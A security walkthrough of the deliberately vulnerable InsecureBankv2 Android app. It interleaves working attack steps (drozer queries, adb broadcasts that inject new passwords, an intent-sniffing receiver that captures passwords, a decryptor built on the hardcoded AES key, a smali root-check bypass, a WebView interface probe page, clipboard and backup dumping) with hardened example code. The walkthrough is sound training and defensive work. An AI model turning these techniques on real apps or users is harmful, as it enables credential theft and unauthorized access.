InsecureBankv2 Walkthrough

0x00 Introduction

Testing the Android-InsecureBankv2 practice APK.

Repository:
https://github.com/dineshshetty/Android-InsecureBankv2

First, collect the package and permission information with drozer:

dz> run app.package.info -a  com.android.insecurebankv2
Package: com.android.insecurebankv2
Application Label: InsecureBankv2
Process Name: com.android.insecurebankv2
Version: 1.0
Data Directory: /data/data/com.android.insecurebankv2
APK Path: /data/app/com.android.insecurebankv2-1.apk
UID: 10048
GID: [3003, 1015, 1028]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.INTERNET
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.SEND_SMS
- android.permission.USE_CREDENTIALS
- android.permission.GET_ACCOUNTS
- android.permission.READ_PROFILE
- android.permission.READ_CONTACTS
- android.permission.READ_PHONE_STATE
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.READ_CALL_LOG
- android.permission.ACCESS_NETWORK_STATE
- android.permission.ACCESS_COARSE_LOCATION
Defines Permissions:
- None


dz> run app.package.attacksurface com.android.insecurebankv2
Attack Surface:
5 activities exported
1 broadcast receivers exported
1 content providers exported
0 services exported
is debuggable

0x01 Flawed Broadcast Receivers

dz> run app.broadcast.info -a com.android.insecurebankv2
Package: com.android.insecurebankv2
com.android.insecurebankv2.MyBroadCastReceiver
Permission: null

The receiver's code:

1.png

Because the receiver is exported with no permission, it can be triggered from an adb shell:

am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver --es phonenumber "15555215554" --es newpass "Jack@123$"

0x02 Intent Sniffing and Injection

Using the parameter names from the screenshot below,
2.png

write a receiver in a separate test app that listens for the same broadcast:

package com.example.sniffer; // package and class name of the test app are mine

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class SniffReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        // The same extra names the bank app puts on its broadcast
        String phn = intent.getStringExtra("phonenumber");
        String newpass = intent.getStringExtra("newpass");

        if (phn != null) {
            try {
                // Hand the captured values to our own activity
                Intent bintent = new Intent(context, MainActivity.class);
                bintent.putExtra("phonenumber", phn);
                bintent.putExtra("newpass", newpass);

                bintent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                context.startActivity(bintent);

                System.out.println("Phonenumber:" + phn);
                System.out.println("newpass:" + newpass);

            } catch (Exception e) {
                e.printStackTrace();
            }
        } else {
            System.out.println("Phone number is null");
        }
    }
}

Registered in the test app's manifest with an intent-filter for the same action, this receiver picks up the phonenumber and newpass extras: the bank app's password-change broadcast is implicit and carries no permission, so any app on the device can read the new password.
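Why both 0x01 (injecting into the exported receiver) and 0x02 (sniffing the broadcast) work, and what the fix looks like, as an added example that is not code from InsecureBankv2; the action string, package and class names are assumptions made for this example:

```java
package com.example.hardened; // hypothetical package used for this example

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

/**
 * A broadcast with no target component is delivered to every receiver whose
 * intent-filter matches the action, including one in a hostile app (0x02), and
 * the app's own receiver is reachable from outside because it is exported with
 * no permission, drozer's "Permission: null" (0x01). The password leaks both ways.
 */
public class PasswordChangeBroadcast {
    // Action name is an assumption for this example, not the app's real one.
    static final String ACTION = "com.example.hardened.PASSWORD_CHANGED";

    /** Vulnerable: implicit broadcast; every matching receiver on the device gets the extras. */
    static void sendVulnerable(Context ctx, String phone, String newPass) {
        Intent i = new Intent(ACTION);
        i.putExtra("phonenumber", phone);
        i.putExtra("newpass", newPass);
        ctx.sendBroadcast(i);
    }

    /**
     * Hardened: explicit component, so the system delivers only to this app's
     * receiver, and no secret in the extras at all. The receiver is declared in
     * the manifest with android:exported="false", which makes the system refuse
     * deliveries from other UIDs (am broadcast from a shell included).
     */
    static void sendHardened(Context ctx, String phone) {
        Intent i = new Intent(ctx, PasswordChangeReceiver.class); // explicit target
        i.setPackage(ctx.getPackageName());                       // belt and braces
        i.putExtra("phonenumber", phone);
        ctx.sendBroadcast(i);
    }

    /** Receiving side. With exported="false" only this app's own UID can reach it. */
    public static class PasswordChangeReceiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            String phone = intent.getStringExtra("phonenumber");
            // Validate even though the sender is trusted: digits only, E.164 length range.
            if (phone == null || !phone.matches("[0-9]{10,15}")) {
                return; // reject malformed input instead of forwarding it
            }
            // Act on the notification here. Never print credentials: the original
            // wrote the new password with System.out, which lands in logcat (see 0x09).
        }
    }
}
```

The point of sendHardened is that the new password never travels in an intent; whatever the receiver has to do with it should read app-private state the app already owns. If a broadcast must cross process boundaries, protect it with a signature-level android:permission on both the receiver and the sendBroadcast(intent, permission) call.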

0x03 Weak Authorization mechanism

In LoginActivity.java we find:

3.png

Follow the button_CreateUser click handler to see what it does:

4.png

Then follow the createUser function:

5.png

The admin check is purely client-side: it only compares the is_admin string resource, so changing that resource in the decompiled APK is all it takes.

6.png

After that the admin functionality (creating users) is available.

0x04 Local Encryption issues+Weak Cryptography implementation+Hardcoded secrets

cd /data/data/com.android.insecurebankv2/shared_prefs

7.png

Open the two files in that directory:

8.png

The SharedPreferences file holds sensitive values, but they are stored encrypted:

9.png

Locate the encryption class, CryptoClass.java:

// The decryption routine from CryptoClass.java, dropped into a small test activity
// (imports and the class wrapper are added here; the class name is mine).
package com.android.insecurebankv2;

import android.app.Activity;
import android.os.Bundle;
import android.util.Base64;
import java.io.UnsupportedEncodingException;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.security.spec.AlgorithmParameterSpec;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class CryptoTestActivity extends Activity {

    // The super secret key used by the encryption function
    // (hardcoded in the APK; 32 ASCII bytes, so the whole AES-256 key is public)
    String key = "This is the super secret key 123";

    // The initialization vector used by the encryption function
    // (a fixed all-zero IV, so equal plaintexts give equal ciphertexts)
    byte[] ivBytes = {
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };
    String plainText;
    byte[] cipherData;
    String base64Text;
    String cipherText;

    /*
    The function that handles the aes256 decryption.
    ivBytes: Initialization vector used by the decryption function
    keyBytes: Key used as input by the decryption function
    textBytes: Ciphertext input to the decryption function
    */
    public static byte[] aes256decrypt(byte[] ivBytes, byte[] keyBytes, byte[] textBytes)
            throws UnsupportedEncodingException,
            NoSuchAlgorithmException,
            NoSuchPaddingException,
            InvalidKeyException,
            InvalidAlgorithmParameterException,
            IllegalBlockSizeException,
            BadPaddingException {

        AlgorithmParameterSpec ivSpec = new IvParameterSpec(ivBytes);
        SecretKeySpec newKey = new SecretKeySpec(keyBytes, "AES");
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, newKey, ivSpec);
        return cipher.doFinal(textBytes);
    }

    // base64-decode the stored value, then AES-256/CBC decrypt it with the fixed key and IV
    public String aesDeccryptedString(String theString) throws UnsupportedEncodingException, InvalidKeyException,
            NoSuchAlgorithmException, NoSuchPaddingException, InvalidAlgorithmParameterException,
            IllegalBlockSizeException, BadPaddingException {
        byte[] keyBytes = key.getBytes("UTF-8");
        cipherData = aes256decrypt(ivBytes, keyBytes, Base64.decode(theString.getBytes("UTF-8"), Base64.DEFAULT));
        plainText = new String(cipherData, "UTF-8");
        return plainText;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // The encrypted value to recover
        String password = "ecwTx6F9cmLbqyD+1yfKjA==";
        String decryptedPassword;
        try {
            decryptedPassword = aesDeccryptedString(password);
            System.out.println(decryptedPassword);
        } catch (InvalidKeyException e) {
            e.printStackTrace();
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        } catch (NoSuchPaddingException e) {
            e.printStackTrace();
        } catch (InvalidAlgorithmParameterException e) {
            e.printStackTrace();
        } catch (IllegalBlockSizeException e) {
            e.printStackTrace();
        } catch (BadPaddingException e) {
            e.printStackTrace();
        }
    }
}

Extracting the decryption function together with its hardcoded key and all-zero IV, as above, is enough: every value the app "protects" this way can be recovered by anyone who can read the APK.
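An added desktop tool (not part of the project) that reproduces the app's decryption with the constants from CryptoClass.java, so values copied out of the shared_prefs file can be recovered without running the app. The second half shows what a sound design looks like: a random nonce per message and an authenticated mode (AES-GCM). On Android the key would live in AndroidKeyStore rather than in the code; this example stands in for that with a throwaway random key, which is an assumption of the demo, not a recommendation.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

/**
 * Offline recovery of values stored by InsecureBankv2's CryptoClass.
 * Everything needed to decrypt ships in the APK: a hardcoded 32-byte key
 * (AES-256) and an all-zero 16-byte IV. Run with the base64 value copied from
 * /data/data/com.android.insecurebankv2/shared_prefs/*.xml as the argument.
 */
public class InsecureBankDecrypt {
    // Same constants as CryptoClass.java (copied from the decompiled source above).
    static final byte[] KEY = "This is the super secret key 123".getBytes(StandardCharsets.UTF_8);
    static final byte[] ZERO_IV = new byte[16];

    /** Mirrors CryptoClass.aesDeccryptedString: base64 -> AES-256/CBC/PKCS5 with fixed key and IV. */
    static String decryptStoredValue(String base64CipherText) throws GeneralSecurityException {
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(ZERO_IV));
        byte[] plain = cipher.doFinal(Base64.getDecoder().decode(base64CipherText));
        return new String(plain, StandardCharsets.UTF_8);
    }

    /**
     * What the app should have done instead: a fresh random 96-bit nonce per
     * message and AES-GCM, which also authenticates the ciphertext. The nonce is
     * prepended to the output. The key must come from outside the code (on
     * Android: a key generated in and held by AndroidKeyStore; assumed here).
     */
    static byte[] encryptProperly(byte[] key, byte[] plaintext) throws GeneralSecurityException {
        byte[] nonce = new byte[12];
        new SecureRandom().nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"), new GCMParameterSpec(128, nonce));
        byte[] ct = cipher.doFinal(plaintext);
        byte[] out = new byte[nonce.length + ct.length];
        System.arraycopy(nonce, 0, out, 0, nonce.length);
        System.arraycopy(ct, 0, out, nonce.length, ct.length);
        return out;
    }

    /** Inverse of encryptProperly; a tampered blob fails with AEADBadTagException instead of decrypting. */
    static byte[] decryptProperly(byte[] key, byte[] nonceAndCt) throws GeneralSecurityException {
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key, "AES"),
                new GCMParameterSpec(128, nonceAndCt, 0, 12));
        return cipher.doFinal(nonceAndCt, 12, nonceAndCt.length - 12);
    }

    public static void main(String[] args) throws Exception {
        // Default to the ciphertext that appears in the test activity above.
        String ct = args.length > 0 ? args[0] : "ecwTx6F9cmLbqyD+1yfKjA==";
        System.out.println("decrypted: " + decryptStoredValue(ct));

        // Round trip through the hardened variant with a throwaway key (demo only).
        byte[] demoKey = new byte[32];
        new SecureRandom().nextBytes(demoKey);
        byte[] blob = encryptProperly(demoKey, "demo".getBytes(StandardCharsets.UTF_8));
        System.out.println("gcm round trip: " + new String(decryptProperly(demoKey, blob), StandardCharsets.UTF_8));
    }
}
```

Compile with javac and run with the base64 string from the preferences file as the argument. Note that a hardcoded key plus a fixed IV is not a weakness of AES; it is the absence of a secret. With the key in the APK, the "encryption" is an encoding that anyone with the file can reverse.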

0x05 Vulnerable Activity Components

List the app's activities:

run app.activity.info -a com.android.insecurebankv2

10.png

PostLogin is exported, so it can be started directly from an adb shell:

am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

This lands on the post-login screen without ever authenticating. The fix is to declare activities that are not entry points with android:exported="false" and to verify the session state in onCreate instead of trusting that the login screen was shown first.

0x06 Root Detection and Bypass

The app calls showRootStatus; follow it:

11.png

Here are the checks used to decide whether the device is rooted:

12.png

The :cond_2 branch is the one that displays "Device not Rooted!!":

13.png

So patch the smali with a goto to :cond_2 ahead of the checks, so execution always takes that branch:

14.png

Screenshot after rebuilding with the patch:

15.png

0x07 Insecure Content Provider access

List the app's content providers:

run app.provider.info -a com.android.insecurebankv2

16.png

Find the content URIs it serves:

run app.provider.finduri com.android.insecurebankv2

17.png

These URIs have the form

content://<package name>.<provider name>/<table name>

Query the trackerusers table:

run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

drozer, running as an unprivileged app, gets back the accounts that have logged in, because the provider is exported and enforces no permission:

18.png

0x08 Insecure Webview implementation + Insecure SDCard storage

In DoLogin.java the following code writes the statement file to the SD card, where any app with storage permission can read and overwrite it:

19.png

Pull Statements_jack.html to the computer and modify it:

adb pull /mnt/sdcard/Statements_jack.html Statements_jack

Replace its contents with the following test page. It iterates over window and flags every object that exposes getClass, which is what a Java object injected with addJavascriptInterface looks like; on targets below API 17 every public method of such an object is reachable, and reflection through getClass reaches java.lang.Runtime:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>WebView vulnerability check</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
</head>
<body>
<p>
<b>If the app is vulnerable, the exposed interfaces are listed below:</b>
</p>
<script type="text/javascript">
function check()
{
  for (var obj in window)
  {
    try {
      // a JS object with a getClass method is an injected Java object
      if ("getClass" in window[obj]) {
        try{
          window[obj].getClass();
          document.write('<span style="color:red">'+obj+'</span>');
          document.write('<br />');
        }catch(e){
        }
      }
    } catch(e) {
    }
  }
}
check();
</script>
</body>
</html>
adb push Statements_jack /mnt/sdcard/Statements_jack.html

Result when the app loads the modified statement:
20.png
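The hardened counterpart of the statement flow, as an added example that is not code from InsecureBankv2: the statement is written to app-private internal storage instead of the SD card, and the WebView that renders it has JavaScript, file access and the legacy bridge switched off. Class, file and package names are assumptions.

```java
package com.example.hardened; // hypothetical package used for this example

import android.app.Activity;
import android.content.Context;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.io.BufferedReader;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;

/**
 * Vulnerable flow (InsecureBankv2): DoLogin writes Statements_<user>.html to the
 * SD card and the statement screen loads it into a JavaScript-enabled WebView.
 * External storage is shared, so anyone with WRITE_EXTERNAL_STORAGE (or adb push)
 * can replace the file and run script inside the app.
 *
 * Hardened version: keep the file in the app's private internal storage and load
 * it with every WebView capability that is not needed switched off.
 */
public class StatementActivity extends Activity {
    static final String STATEMENT_FILE = "statement.html"; // lives under getFilesDir()

    /** Writes to /data/data/<pkg>/files, which other UIDs cannot read or modify. */
    static void saveStatement(Context ctx, String html) throws IOException {
        try (FileOutputStream out = ctx.openFileOutput(STATEMENT_FILE, Context.MODE_PRIVATE)) {
            out.write(html.getBytes(StandardCharsets.UTF_8));
        }
    }

    static String loadStatement(Context ctx) throws IOException {
        StringBuilder sb = new StringBuilder();
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(ctx.openFileInput(STATEMENT_FILE), StandardCharsets.UTF_8))) {
            String line;
            while ((line = r.readLine()) != null) sb.append(line).append('\n');
        }
        return sb.toString();
    }

    /** Locks down a WebView that only has to render static HTML. */
    static void hardenWebView(WebView wv) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(false);              // the check() page above would not run at all
        s.setAllowFileAccess(false);                // no file:// reads, so SD-card content is unreachable
        s.setAllowContentAccess(false);             // no content:// reads either
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);
        // Pre-KitKat WebViews expose this bridge by default; remove it even with JS off.
        wv.removeJavascriptInterface("searchBoxJavaBridge_");
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView wv = new WebView(this);
        hardenWebView(wv);
        setContentView(wv);
        try {
            // Load as data, not as a file:// URL, so the document has no file origin.
            wv.loadDataWithBaseURL(null, loadStatement(this), "text/html", "utf-8", null);
        } catch (IOException e) {
            wv.loadData("<p>No statement available.</p>", "text/html", "utf-8");
        }
    }
}
```

If script really is required in such a screen, keep setJavaScriptEnabled(true) only on that WebView, target API 17 or later so that only @JavascriptInterface-annotated methods are exposed, and still never load the document from external storage.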

0x09 Insecure Logging mechanism

Add a logcat filter for com.android.insecurebankv2.

21.png

Sensitive data shows up in logcat, which anyone with adb access to the device can read:

22.png

0x10 Android keyboard cache issues

23.png
Words typed into the app's input fields are remembered by the keyboard and end up in the user dictionary database:
/data/data/com.android.providers.userdictionary/databases/user_dict.db

24.png

0x11 Application Debuggable

The manifest marks the app as debuggable (drozer reported "is debuggable" above), so jdb can be attached to the live process. Open DDMS and note the process id of com.android.insecurebankv2:

25.png

adb forward tcp:23946 jdwp:1082
jdb -connect "com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=23946"

Here 1082 is the pid shown by DDMS (adb jdwp lists it too) and jdb must connect to the same local port that was forwarded. When DDMS itself is running with the process selected, connecting to its debug port 8700 also works and no adb forward is needed.

26.png

List the loaded classes:

classes

27.png
28.png

List the methods of the login activity:

methods com.android.insecurebankv2.LoginActivity

29.png

With a breakpoint set on the handler of interest, tap the Create User button:

30.png

step

31.png

Inspect the local variables:

locals

32.png

Change the content of the text variable:

33.png

Then execute the run command to resume:

34.png

Result:
35.png

0x12 Android Pasteboard vulnerability

36.png
Text copied from the app's fields is placed on the system clipboard, which any app can read. From an adb shell, find the app's UID, switch to it, and dump the clipboard through the clipboard service (transaction 2 is getPrimaryClip on Android 4.x; the s16 argument is the calling package name the service checks against the UID):

ps | grep insecure
su u0_a48
service call clipboard 2 s16 com.android.insecurebankv2

37.png

0x13 Developer Backdoors

38.png

The login code treats the hardcoded username devadmin specially: it is a developer backdoor account.

0x14 Insecure HTTP connections+Parameter Manipulation

Point the emulator's network proxy at Burp Suite:
39.png
Burp Suite listener settings:

40.png

0x15 Weak change password implementation

Intercept the change-password request and edit the username parameter: the server trusts the username in the request body rather than the authenticated session, so the password of any account can be changed.

41.png

0x16 Username Enumeration issue

42.png

Send the login request to Intruder, mark username as the payload position and run a wordlist against it.

43.png
The response for jack differs from the others, which enumerates it as a valid username.

0x17 Android Backup vulnerability

The app does not opt out of backups, so its private data can be dumped with:

adb backup -f backup.ab com.android.insecurebankv2

44.png

Confirm with "Back up my data" on the device:

45.png

Download android-backup-extractor from https://sourceforge.net/projects/adbextractor/ and unpack it.

backup.ab is written to the current directory; copy it into the android-backup-extractor directory and convert it (the output is a tar archive whatever the extension):

java -jar abe.jar unpack backup.ab backup.zip

46.png

Open backup.zip to browse the app's private data directory:
47.png
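An added Java equivalent of the abe.jar unpack step for unencrypted backups (not part of android-backup-extractor or of the project): it parses the four-line .ab header and inflates the body into a tar archive. Encrypted backups are refused, since they need the password-based key derivation that abe.jar implements.

```java
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.zip.InflaterInputStream;

/**
 * Converts an unencrypted `adb backup` file to a plain tar archive. The .ab
 * format is four newline-terminated header lines ("ANDROID BACKUP", format
 * version, compression flag, encryption method) followed by the tar stream,
 * which is zlib-compressed when the flag is 1.
 */
public class AbToTar {
    /** Reads one newline-terminated header line; fails on a truncated file. */
    static String readLine(InputStream in) throws IOException {
        StringBuilder sb = new StringBuilder();
        int c;
        while ((c = in.read()) != -1 && c != '\n') sb.append((char) c);
        if (c == -1) throw new IOException("truncated header");
        return sb.toString();
    }

    static void convert(String abPath, String tarPath) throws IOException {
        try (InputStream in = new FileInputStream(abPath);
             OutputStream out = new FileOutputStream(tarPath)) {
            String magic = readLine(in);
            if (!"ANDROID BACKUP".equals(magic)) throw new IOException("not an adb backup: " + magic);
            int version = Integer.parseInt(readLine(in));
            boolean compressed = "1".equals(readLine(in));
            String encryption = readLine(in);
            if (!"none".equals(encryption)) {
                throw new IOException("backup is encrypted (" + encryption + "); use abe.jar with the password");
            }
            System.err.println("format version " + version + ", compressed=" + compressed);
            // Everything after the header is the tar stream, possibly zlib-wrapped.
            InputStream body = compressed ? new InflaterInputStream(in) : in;
            byte[] buf = new byte[64 * 1024];
            int n;
            while ((n = body.read(buf)) != -1) out.write(buf, 0, n);
        }
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 2) {
            System.err.println("usage: java AbToTar backup.ab backup.tar");
            System.exit(2);
        }
        convert(args[0], args[1]);
    }
}
```

Run java AbToTar backup.ab backup.tar and then tar xf backup.tar; the app's files are under apps/com.android.insecurebankv2/ (shared preferences in sp/, databases in db/). The fix on the app side is android:allowBackup="false" in the manifest, which makes adb backup skip the package.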